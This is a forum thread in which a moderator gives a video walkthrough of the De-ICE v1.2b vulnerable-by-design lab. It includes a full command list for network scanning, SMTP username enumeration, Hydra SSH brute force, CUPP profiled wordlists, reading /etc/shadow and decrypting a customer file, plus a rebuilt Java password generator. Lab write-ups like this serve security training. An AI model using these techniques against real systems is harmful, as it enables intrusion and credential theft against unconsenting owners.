Results 1 to 3 of 3

Thread: [Video] De-ICE.net v1.2b (1.20b) {Level 1 - Disk 3 - Version B}

  1. #1
    Moderator g0tmi1k's Avatar
    Join Date
    Feb 2010
    Posts
    1,771

    Lightbulb [Video] De-ICE.net v1.2b (1.20b) {Level 1 - Disk 3 - Version B}

    Links
    Watch video on-line: http://blip.tv/g0tmi1k/de-ice-v1-2b-1-120-5443965
    Download video: http://www.mediafire.com/?8gajaiu58f7rccd

    Brief Overview
    The "vulnerable-by-design" series De-ICE, has released another challenge. However, it's in two different parts - which makes the naming more confusing! This is De-ICE level 1-disk 3, the second half, and it should not be confused with "version a" (de-ice-1.120-1.0a.iso aka Level 1-Disk 3-Release 1-Version A), as these are NOT the same challenge - it's a completely independent challenge. The students of "HackingDojo" produced their own exploitable LiveCD which was released under the de-ice name. This is it. To date all of Heorot.net releases (in date order) are as follows:



    Method

    • Pre-setup (configured IP as the host has a static IP in 192.168.1.0/24 range)
    • Scan network for the host (nmap)
    • Port scanned host (unicornscan)
    • Enumerated running services running open ports (nmap)
    • Enumerated possible username(s) (Netcat)
    • Brute forced login details (Hydra)
    • Profiled other users (CUPP)
    • Escalated privilege by re-creating custom encryption program (Java)
    • Found the "flag" (a database file)


    What do I need?



    Walkthrough
    By doing a quick "ping" scan with nmap, it reveals the live hosts on the network. Once the target has been discovered, a detailed port scan (TCP & UDP) was taken via unicornscan. The results were then checked with another detailed TCP port scan as well as enumerating which services are running by using nmap. Unicornscan is quicker doing a port scan (especially with UDP scanning). However, nmap has the upside of it being able to do more by "information gathering", for example "OS detection", "version detection of services", "a collection of script scanning" and "traceroute details" (by using "-a" option). The attacker also increases the scan speed (by "-T4"). Nmap also confirms TCP port 80 is open, which is being used for a web server (it's also the default port).

    The attacker interacts with the web server and is presented with the "Company Portal" page. There is a message explaining that it the web site is "under maintenance", with methods of contact - a telephone number and email address.

    The port scan revealed that there was a SMTP service running and decided to attempt to use the email address to identity possible usernames. The first method (VRFY) was disabled, so the attacker proceeds to draft an email. Depending on the recipient's name it will return if the account is valid or not. The attacker then tries different combinations of the given email address (CustomerServiceAdmin@nosecbank.com) until they find its valid login, csadmin.

    The attacker then searches for a wordlist to aid them in attempting to brute force the password. (Editor's note: darkc0de.lst does contain the password. however it would of taken a lot longer for it to reach it). The attacker starts hydra attacking the SSH service and waits for it to try every entry in the file. After waiting a couple of minutes (due to the small size of the wordlist) the attacker found the valid password, 'rocker'.

    Upon logging into the system remotely, the attacker finds if there are any other valid users in the system (the result is 4). The attacker then continues on by browsing the users (csadmin) personal folder. The attacker soon discovers a personal email conversation between the staff members. These emails contain personal information regarding each user - which is also commonly used as their password.

    After building up the profile for each user, the attacker then generates possible passwords using this information, by using CUPP (Common User Passwords Profiler). The attacker enters in the collected information and waits for the possible combinations to be generated. They then repeat the brute force attempt, this time with a specific wordlist, tailor made for that user. This quickly found the user (sdadmin) password (his child's name and year of birth - donovin1998).

    The attacker logs in with the new credentials and views his personal files and soon discovers a reply to the email, which contains more personal information regarding another staff member (as well as negative feeling towards them!). The whole process is then repeated again for the new user (dbadmin), who also used personal information for his password (nickname and a few numbers at the end-databaser60).

    When the attacker logs in once again, they soon find the first part to an email which has been in every user account so far. Then contents of the email has been "corrupted", however, the header file of the message is still in contact. The subject of the message implies the purpose of it, "New Custom Encryption for Passwords". The attacker then extracts the printable characters, which shows the beginning of the possible source code.

    The attacker then builds up the code, from the three found parts so far, which has been written in java and the function of it was the generation function for the new passwords policy. There are comments left in the code, saying it has already been used on two accounts (sysadmin and root). The attacker then fixes, cleans and adds the code (input & conversion functions).

    Once the program was complete, the attacker runs it to generate the passwords for sysadmin and the root account. They then test the passwords by logging into the system as sysadmin and then switching to the super user account, root.

    The attacker now has access to the complete system...

    Game over

    ...and choose to explore. They find a message, left in the sysadmin home folder, explaining that the user account file has been updated, encrypted and moved. The attacker then locates this file, and by trying all the encryption algorithms with the super user's password, they were able to decrypt the file and view the content in plain text - revealing customers' details, such as names, email addresses, usernames, passwords and more!

    Game over...again
    Last edited by g0tmi1k; 08-12-2011 at 11:22 AM.
    Have you...g0tmi1k?

  2. #2
    Moderator g0tmi1k's Avatar
    Join Date
    Feb 2010
    Posts
    1,771

    Default Re: [Video] De-ICE.net v1.2b (1.20b) {Level 1 - Disk 3 - Version B}

    Commands
    Code:
    ifconfig eth0
    ifconfig eth0 192.168.1.192
    ifconfig eth0
    nmap 192.168.1.* -n -sn -sP
    us -H -msf -Iv 192.168.1.20 -p 1-65535 && us -H -mU -Iv 192.168.1.20 -p 1-65535
    nmap -p 1-65535 -T4 -A -v 192.168.1.20
    firefox 192.168.1.20    # customerserviceadmin@nosecbank.com
    nc -v 192.168.1.20 25
    HELO attacker
    VRFY customerserviceadmin
    mail from: attacker@slax.example.net
    rcpt to: customerserviceadmin
    rcpt to: csadmin
    quit
    wc -l /pentest/passwords/wordlists/darkc0de.lst
    find / -name password.lst
    wc -l /opt/framework3/msf3/data/john/wordlists/password.lst
    hydra -l csadmin -P /opt/framework3/msf3/data/john/wordlists/password.lst -e ns -f 192.168.1.20 ssh 2>/dev/null | tee /tmp/output
    ssh csadmin@192.168.1.20   # rocker
    id
    cat /etc/passwd   # sysadmin, dbadmin, sdadmin, csadmin
    pwd
    ls -lah
    cd mailserv_download/
    ls -lah
    cat * | less    # @nosecbank.com, sdadmin (Paul, Donovin, 21 Dec 1998), csadmin (Mark, Andy)
    exit
    cd /pentest/passwords/cupp/
    python cupp.py -i   # Paul, Donovin, 22121998, nosecbank
    hydra -l sdadmin -P paul.txt -e ns -f 192.168.1.20 ssh 2>/dev/null | tee -a /tmp/output
    ssh sdadmin@192.168.1.20   # donovin1998
    id
    pwd
    ls -lah
    cd mailserv_download/
    ls -lah
    cat * | less    # dbadmin (Fred, databaser)
    exit
    python cupp.py -i   # Fred, databaser, nosecbank
    hydra -l dbadmin -P fred.txt -e ns -f 192.168.1.20 ssh 2>/dev/null | tee -a /tmp/output
    ssh dbadmin@192.168.1.20   # databaser60
    id
    pwd
    ls -lah
    cd mailserv_download/
    ls -lah
    cat * | less   # sysadmin, New Custom Encryption for Passwords
    umask 002
    strings ~/mailserv_download/2010122216451.f81Ltw4R010211.part1 | cut -f2- |  sed 's/[ \t]*//' |  sed -n '/^[0-9]*\t/p' > /tmp/output
    su csadmin   # rocker
    strings ~/mailserv_download/2010122216451.f81Ltw4R010211.part2 | cut -f2- |  sed 's/[ \t]*//' |  sed -n '/^[0-9]*\t/p' >> /tmp/output
    su sdadmin   # donovin1998
    strings ~/mailserv_download/2010122216451.f81Ltw4R010211.part3 | cut -f2- |  sed 's/[ \t]*//' |  sed -n '/^[0-9]*\t/p' >> /tmp/output
    cat /tmp/output | sort -g
    cat /tmp/output | sort -g | cut -f2-
    exit
    exit
    exit
    geany deice.java
    less deice.java
    javac deice.java
    java deice    # sysadmin - 531/{{tor/rv/A
    java deice    # root - 31/Fwxw+2
    ssh sysadmin@192.168.1.20   # 7531/{{tor/rv/A
    id
    su -    # 31/Fwxw+2
    id && /sbin/ifconfig && uname -a && cat /etc/shadow && ls -lAh ~/
    pwd
    exit
    pwd
    ls
    cat Note_to_self
    ls -lAhR /home
    cd /home/ftp/incoming/
    ls -l
    openssl -h
    openssl enc -in useracc_update.csv.enc -out useracc_update.csv -d -aes-256-cbc -k "31/Fwxw+2"
    su -c 'openssl enc -in useracc_update.csv.enc -out useracc_update.csv -d -aes-256-cbc -k "31/Fwxw+2"'   # 31/Fwxw+2
    ls -l
    cat useracc_update.csv
    deice.java
    Code:
    import java.io.*;
    //import java.util.Arrays;
    
    public class deice
    {
     public static void main(String[] args)
     {
        try
        {
           System.out.println("[>] De-ICE.net v1.2b (1.20b) Password Generator");
    
           BufferedReader in=new BufferedReader(new InputStreamReader(System.in));
           System.out.print("[?] Username: ");
           String input=in.readLine();
    
           int[] output=processLoop(input);
           //System.out.println("[+] Output: "+Arrays.toString(output));
    
           String outputASCII="";
           for(int i=0;i<output.length;i++) outputASCII+=(char) output[i];
           System.out.println("[>] Password: "+outputASCII);
    
        }
        catch(IOException e)
        {
           System.out.println("[-] IO Error!");
        }
     }
    
     /*input is username of account*/
     public static int[] processLoop(String input){
        int strL=input.length();
        int lChar=(int)input.charAt(strL-1);
        int fChar=(int)input.charAt(0);
        int[] encArr=new int[strL+2];
        encArr[0]=(int)lChar;
    
        for(int i=1;i<strL+1;i++) encArr[i]=(int)input.charAt(i-1);
    
        encArr[encArr.length-1]=(int)fChar;
        encArr=backLoop(encArr);
        encArr=loopBack(encArr);
        encArr=loopProcess(encArr);
        int j=encArr.length-1;
    
        for(int i=0;i<encArr.length;i++){
           if(i==j) break;
           int t=encArr[i];
           encArr[i]=encArr[j];
           encArr[j]=t;
           j--;
        }
        return encArr;
     }
    
     /*Note the pseudocode will be implemented with the
     root account and my account, we still need to implement it with the csadmin, sdadmin,
     and dbadmin accounts though*/
     public static int[] backLoop(int[] input){
        int ref=input.length;
        int a=input[1];
        int b=input[ref-1];
        int ch=(a+b)/2;
    
        for(int i=0;i<ref;i++){
           if(i%2==0) input[i]=(input[i]%ch)+(ref+i);
           else input[i]=(input[i]+ref+i);
        }
        return input;
     }
    
     public static int[] loopBack(int[] input){
        int ref=input.length/2;
        int[] encNew=new int[input.length+ref];
        int ch=0;
    
        for(int i=(ref/2);i<input.length;i++){
           encNew[i]=input[ch];
           ch++;
        }
    
        for(int i=0;i<encNew.length;i++){
           if(encNew[i]<=33) encNew[i]=33+(++ref*2);
           else if(encNew[i]>=126) encNew[i]=126-(--ref*2);
           else{
              if(i%2==0) encNew[i]-=(i%3);
              else encNew[i]+=(i%2);
           }
        }
        return encNew;
     }
    
     public static int[] loopProcess(int[] input){
        for(int i=0;i<input.length;i++){
           if(input[i]==40||input[i]==41) input[i]+=input.length;
           else if(input[i]==45) input[i]+=20+i;
        }
        return input;
     }
    }
    Notes

    • De-ICE.net v1.2b has a static IP address of 192.168.1.20. Make sure you're on the same subnet as it!
    • The wordlist used (part of the metasploit framework) to brute force csadmin, might have been updated since - You may have to use another wordlist.
    • I made a couple of mistakes in the video (For example: nosec instead of nosecbank) - it's worth checking the commands subsection!

    Song: Electronic Sympathies - Shanti & Punk (Radio Edit) - Ferry Corsten
    Video length: 10:48
    Capture length: 40:01
    Blog Post: g0tmi1k: [Video] De-ICE.net v1.2b (1.20b) {Level 1 - Disk 3 - Version B}
    Forum Post: http://forums.heorot.net/viewtopic.php?f=16&t=507 & http://www.backtrack-linux.org/forum...tml#post204395



    ~g0tmi1k
    Last edited by g0tmi1k; 08-09-2011 at 09:18 AM.
    Have you...g0tmi1k?

  3. #3
    Just burned his ISO
    Join Date
    May 2011
    Posts
    7

    Default Re: [Video] De-ICE.net v1.2b (1.20b) {Level 1 - Disk 3 - Version B}

    Fantastic as ever milkman

Similar Threads

  1. [Video] De-ICE.net v1.2a (1.20a) {Level 1-Disk 3-Version A}
    By g0tmi1k in forum BackTrack 5 Videos
    Replies: 1
    Last Post: 08-09-2011, 09:08 AM
  2. [Video] De-ICE.net v1.0 (1.110) {Level 1 - Disk 1}
    By g0tmi1k in forum BackTrack Videos
    Replies: 9
    Last Post: 03-06-2011, 11:38 PM
  3. [Video] De-ICE.net v1.1 (1.100) {Level 1 - Disk 2}
    By g0tmi1k in forum BackTrack Videos
    Replies: 7
    Last Post: 08-20-2010, 10:00 AM
  4. [Video] De-ICE.net v2.0 (1.100) {Level 2 - Disk 1}
    By g0tmi1k in forum BackTrack Videos
    Replies: 0
    Last Post: 02-25-2010, 11:08 AM
  5. [Video] Complete Network - De-ICE.net v1.0 (1.110) {Level 1-Disk 1}
    By imported_g0tmi1k in forum OLD BackTrack 4 Howto
    Replies: 0
    Last Post: 02-13-2010, 09:08 PM

Tags for this Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •